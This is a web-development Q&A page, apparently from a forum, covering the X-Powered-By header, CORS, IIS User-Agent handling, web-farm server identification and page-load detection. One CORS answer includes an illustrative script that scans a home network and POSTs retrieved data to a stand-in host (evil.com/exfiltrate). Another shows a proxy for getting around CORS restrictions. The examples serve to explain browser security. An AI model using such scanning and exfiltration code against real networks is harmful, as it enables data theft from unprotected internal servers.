Should I mess with the X-Powered-By header?

We're dealing with a legacy application that emits an HTML blurb which was
previously consumed by a web browser. Now we're turning (a new instance of)
it into a service and bringing it inside the corporate firewall, onto the
intranet, to be consumed by automated clients.
The code was returning HTTP 200 OK for Not Found situations, along with
some HTML explaining that the information could not be found. We're
considering returning a 404 Not Found code instead, but we want some way to
tell responses from the application and responses from the web server apart
(in case something gets misconfigured and the app can no longer be reached).
Now we get to the meat of the question: should we change the X-Powered-By
header in the application? Do web servers and proxies respect that header? We
can certainly test our current web server, but can we count on future server
updates/changes to preserve this behaviour? Is this header governed by any
spec (RFC, etc.)?
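For illustration, here is a minimal sketch of that idea as a Node.js-style TypeScript service. The header name X-Answered-By and its value are hypothetical; the point is that the application stamps every response it generates, including 404s, so a response without the header must have come from the web server or proxy instead:

    import * as http from "http";

    // Hypothetical stand-in for the legacy HTML-blurb lookup.
    function findBlurb(path: string): string | undefined {
        return path === "/known" ? "<p>Here is the blurb.</p>" : undefined;
    }

    http.createServer((req, res) => {
        // Stamped on every response, including Not Found, so clients can
        // tell an application answer from a web-server/proxy answer.
        res.setHeader("X-Answered-By", "legacy-blurb-service");
        const blurb = findBlurb(req.url ?? "/");
        if (blurb === undefined) {
            res.writeHead(404, { "Content-Type": "text/html" });
            res.end("<p>The information could not be found.</p>");
        } else {
            res.writeHead(200, { "Content-Type": "text/html" });
            res.end(blurb);
        }
    }).listen(8080);

Well-behaved intermediaries generally pass unrecognized response headers through untouched, but that is convention rather than a guarantee from any spec.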

Related

.NET Core 2 MVC - Not loading on HTTP, does load on HTTPS

I am working on an API in .NET core 2.
Everything works great when testing on https://localhost:44333, but when trying on http://localhost:44333 it does not work anymore. It just loads, and loads, and loads.... Nothing to see in the logs or anything like that.
The thing is, I need to get it working on HTTP because I want to try it on my phone in the app. So I use iisexpress-proxy to proxy it. This works when I can access the API on HTTP, but it doesn't work with HTTPS.
So therefore I need it to work with HTTP, but I have no idea why it does not. All my previous projects worked fine on HTTP, and for some reason this one does not. I have looked through my Startup to see whether HTTPS might be forced or something like that, but I cannot find anything...
You probably need more information than this, but I don't know what you need, so If you ask in the comments I will provide some more information/logs/code you name it.
The http version will be served on a different port. You'll need to look at your project properties to see which port it's being served on.
Just as some background:
There's effectively a client-side and a server-side component to SSL. The http or https scheme is the client-side component: it determines whether the browser (or other web client) will try to negotiate a secure socket or not. The server-side component is the port binding, which is either a secure socket or not.
The forever-loading happens because your client is making a non-secure request while the server's socket is trying to negotiate SSL. It's like one person speaking Chinese and the other speaking Spanish: both are talking, but nothing gets communicated.
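As a sketch of where to look: an ASP.NET Core project's Properties/launchSettings.json typically binds HTTP and HTTPS to different ports. The numbers below are illustrative, not taken from the question:

    {
      "iisSettings": {
        "iisExpress": {
          "applicationUrl": "http://localhost:12345",
          "sslPort": 44333
        }
      }
    }

With a binding like this, plain HTTP is served on 12345 and HTTPS on 44333, which is why browsing to http://localhost:44333 hangs instead of answering.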

How does CORS (Access-Control-Allow-Origin header) increase security?

I'm doing some work with this right now and I have to say, it makes no sense at all to me! Basically, I have a CDN server which provides CSS, images, etc. for a site. For whatever reason, in order for my browser to stop blocking those resources with a CORS error, I had to have that server (the CDN) add the Access-Control-Allow-Origin header. But as far as I can tell, that does absolutely nothing to increase security. Shouldn't the page I request, which references those cross-domain resources, be telling the browser it's safe to get stuff from the other domain? If that were a malicious domain, wouldn't it just have Access-Control-Allow-Origin set to * so that sites load its malicious responses (you don't have to answer that, because obviously it would)?
So can someone explain how this mechanism/feature provides security? As far as I can tell the implementors fucked up and it actually does nothing. The header should be required from the page which references/requests cross-domain resources, rather than from the domain being requested.
To be clear: if I request a page at domain A, it would make sense for the response to include an Access-Control-Allow-Origin header whitelisting resources from domain B (Access-Control-Allow-Origin: B.com). However, it makes no sense at all for domain B to effectively whitelist itself by sending the Access-Control-Allow-Origin header itself, which is how this is currently implemented. Can anyone clarify what the benefit of this feature is?
If I have a protected resource hosted on site A, but also control sites B, C, and D, I may want to use that resource on all of my sites but still prevent anyone else from using it on theirs. So I instruct site A to send Access-Control-Allow-Origin: B, C, D along with all of its responses. It's up to the web browser itself to honor this and not hand the response to the underlying JavaScript (or whatever initiated the request) if it didn't come from an allowed origin; error handlers are invoked instead. So it's really not for your security so much as it is an honor-system (all major browsers implement it) access-control method for servers.
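A minimal sketch of that allowlist in Node.js-style TypeScript (origins and port are hypothetical). One detail the summary above glosses over: Access-Control-Allow-Origin takes a single origin or *, not a list, so servers usually check the request's Origin header and echo back the one that matched:

    import * as http from "http";

    // Hypothetical origins under my control (sites B, C, and D).
    const allowed = new Set(["https://b.example", "https://c.example", "https://d.example"]);

    http.createServer((req, res) => {
        const origin = req.headers["origin"];
        if (typeof origin === "string" && allowed.has(origin)) {
            // Echo back the single matching origin; browsers reject lists.
            res.setHeader("Access-Control-Allow-Origin", origin);
            res.setHeader("Vary", "Origin");
        }
        res.end("the protected resource");
    }).listen(8080);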
Primarily, Access-Control-Allow-Origin is about protecting data from leaking from one server (let's call it privateHomeServer.com) to another server (let's call it evil.com) via an unsuspecting user's web browser.
Consider this scenario:
You are on your home network browsing the web when you accidentally stumble onto evil.com. This web page contains malicious JavaScript that tries to look for web servers on your local home network and then send their content back to evil.com. It does this by trying to open XMLHttpRequests on all local IP addresses (e.g. 192.168.1.1, 192.168.1.2, ... 192.168.1.255) until it finds a web server.
If you are using an old web browser that isn't Access-Control-Allow-Origin aware, or you have set Access-Control-Allow-Origin: * on your privateHomeServer, then your browser will happily retrieve the data from privateHomeServer (which you presumably didn't bother password-protecting, since it was safely behind your home firewall) and hand that data to the malicious JavaScript, which can then send the information on to the evil.com server.
On the other hand, with an Access-Control-Allow-Origin aware browser and the default configuration on privateHomeServer (i.e. not sending Access-Control-Allow-Origin: *), your browser will block the malicious JavaScript from seeing any data retrieved from privateHomeServer. So you are protected from such attacks unless you go out of your way to change the default configuration on your server.
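To make that concrete, here is a sketch of the probe such a page might run, in browser-style TypeScript (hostnames are from the scenario above). With a CORS-aware browser and a target that sends no Access-Control-Allow-Origin header, the fetch is rejected and the script never sees the data:

    // Runs in the page served by evil.com.
    async function probe(ip: string): Promise<void> {
        try {
            // Rejected by CORS-aware browsers unless the target opts in.
            const res = await fetch(`http://${ip}/`);
            const body = await res.text();
            await fetch("https://evil.com/exfiltrate", { method: "POST", body });
        } catch {
            // Blocked: the data stays on the home network.
        }
    }

    // Scan the whole /24, as described above.
    for (let i = 1; i <= 255; i++) { void probe(`192.168.1.${i}`); }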
Regarding the question:
Shouldn't the page I request which references those cross-domain
resources be telling the browser it's safe to get stuff from the other
domain?
The fact that your page contains code that attempts to get resources from a particular server is implicitly telling the web browser that you believe those resources are safe to fetch. It wouldn't make sense to have to repeat this elsewhere.
CORS only makes sense for mashup content providers, and nothing more.
Example: you are the provider of an embedded-maps mashup service which requires registration. Now you want to make sure that your Ajax mashup map will only work for your registered users on their own domains, and that other domains are excluded. For this reason alone, CORS makes sense.
Another example: someone misuses CORS to protect a REST service. A clever developer sets up an Ajax proxy and, et voilà, you can access that service from any domain.
Such an Ajax proxy would make no sense for a mashup; conversely, CORS makes no sense for REST services, because you could bypass the restriction with a simple HTTP client.
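A sketch of such an Ajax proxy, assuming Node.js 18+ (for the global fetch) and a hypothetical target URL. CORS is enforced by browsers, not servers, so the server-to-server request below is unrestricted, and the proxy re-serves the result with a permissive header:

    import * as http from "http";

    // Hypothetical CORS-restricted service being proxied around.
    const TARGET = "https://api.example.com";

    http.createServer(async (req, res) => {
        // Server-to-server request: the browser's same-origin policy does not apply here.
        const upstream = await fetch(TARGET + (req.url ?? "/"));
        const body = await upstream.text();
        res.writeHead(upstream.status, { "Access-Control-Allow-Origin": "*" });
        res.end(body);
    }).listen(3000);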

What happens when an HTTP request uses different browser headers?

I'm trying to understand how an IIS server handles different browsers specified in the header of an HTTP request.
The situation is that I have some load tests set up that fire off HTTP requests to an IIS server, constructing them and sending them over the wire. My code allows me to specify the browser in the header (i.e. the User-Agent string), but I'm not sure what that would actually change.
So what does IIS do with that particular piece of information in the header?
As far as I am aware, IIS doesn't actually do anything with that header by default.
You can create rules to explicitly handle particular types of browser. This is pretty useful if, for example, you block traffic from certain countries but still want to allow bots through.
It's also useful to have this information in the log files.
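As a sketch of the client side, this is all that "specifying the browser" amounts to: a User-Agent string on the request. Assuming Node.js 18+ in an ES module; the URL and User-Agent value are illustrative:

    // One load-test request claiming to be a particular browser.
    // By default IIS will log the string but not act on it.
    const response = await fetch("http://iis-server.internal/page", {
        headers: { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) LoadTest/1.0" },
    });
    console.log(response.status);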

find which server in a web farm the web method got executed on?

This question is a consequence of the following question: determining which server (in a web farm) the asp.net ajax request came from?
The problem is that we commonly use automatically generated proxy classes to communicate with the web method (which may be part of an ASMX/WCF service). When we receive the response from the web services server, how do we know which server it was processed on?
We receive the response in the server-side code that is executing (mostly). When it's a script service (which can be called via JavaScript), that's another case altogether.
How can we read the response headers once the web service returns?
Am I constrained to building my own proxy classes to solve this problem?
Here's one way. It's not the best way, but it will do until something better comes along. If you have a tool like Fiddler or Burp, you can inspect the response headers, so we can configure IIS to set the response headers appropriately.
By default they are configured to output something like X-ASP.NET... A good idea would be to add the server name to that...
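A sketch of that IIS configuration as a custom response header in web.config; the header name X-Served-By and the value WEB01 are placeholders for your own naming scheme and machine names:

    <configuration>
      <system.webServer>
        <httpProtocol>
          <customHeaders>
            <!-- Placeholder name/value; set a distinct value on each farm member. -->
            <add name="X-Served-By" value="WEB01" />
          </customHeaders>
        </httpProtocol>
      </system.webServer>
    </configuration>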

Is it correct to say that a web browser always knows when a web page is completely loaded?

A browser sends a GET request for a static web page to a server. The server sends back an HTTP 200 OK response with the HTML page in the HTTP body. By looking at the Content-Length field, or looking for the terminating chunk (or some other delimiter for some other encoding), the browser can know whether it has received the whole web page and, subsequently, all its embedded objects (images etc.). Is it correct to say that in this case the browser always knows when a web page has completely loaded, and that it will see no further network traffic?
Now suppose the page is dynamic (let's say Facebook or Gmail), where you might receive notifications, or parts of the page get updated using AJAX or JavaScript running in the background. Here, too, the browser should know when the page has loaded. But what if the server is pushing some updates to the client? Is it possible in this scenario for the browser to know when it has received the full update?
So, is there any scenario in which a browser doesn't know when it has fully received the data (static or dynamic) it has requested from a web server, or the push-based updates the server is forwarding to it?
For the static case, I can only imagine the one scenario where Content-Length is not set; the server is not required to send it.
Potentially, of course, in a page containing scripts, one could also have other scenarios where a script loads bits and pieces one by one, with delays (including the AJAX scenario you mentioned). In those cases the browser would not know in advance either: it would know "for the moment" that the page had loaded completely, but the next action from the script would invalidate that assertion again.
You do not need AJAX to get into a situation where not all elements of the page are loaded even after the page itself has been loaded. A little JavaScript is all that you need:

    <img id="dyn_image" src="/not_clicked.gif">
    <input type="button" value="Click" onclick="document.getElementById('dyn_image').src='/clicked.gif'">
There are cases when the server uses some kind of push technology, for example Comet. In that case a request (generally an Ajax request) is sent without receiving any response (and obviously no HTTP headers either), leaving the TCP connection open. This may take a long time, but it may still be considered a sub-case of Ajax calls.
The other case is HTML5's WebSocket technology. With a WebSocket, the server side can push data to the client without an explicit request from the client.
These two can be combined, so the answer to your question is: yes, there can be cases when you cannot tell whether the network traffic is over. What all these cases have in common is that the client must leave a channel open to the server.
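A minimal sketch of the WebSocket case in browser-style TypeScript (the URL is hypothetical). Once the socket is open, messages arrive unsolicited, so the browser cannot predict whether more traffic is coming:

    // Hypothetical endpoint; the server may push at any moment.
    const socket = new WebSocket("wss://example.com/updates");

    socket.onmessage = (event: MessageEvent) => {
        // There is no "final" message unless the application protocol defines one.
        console.log("server pushed:", event.data);
    };

    socket.onclose = () => {
        // Only the close event tells the client the stream has ended.
        console.log("no further traffic on this channel");
    };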
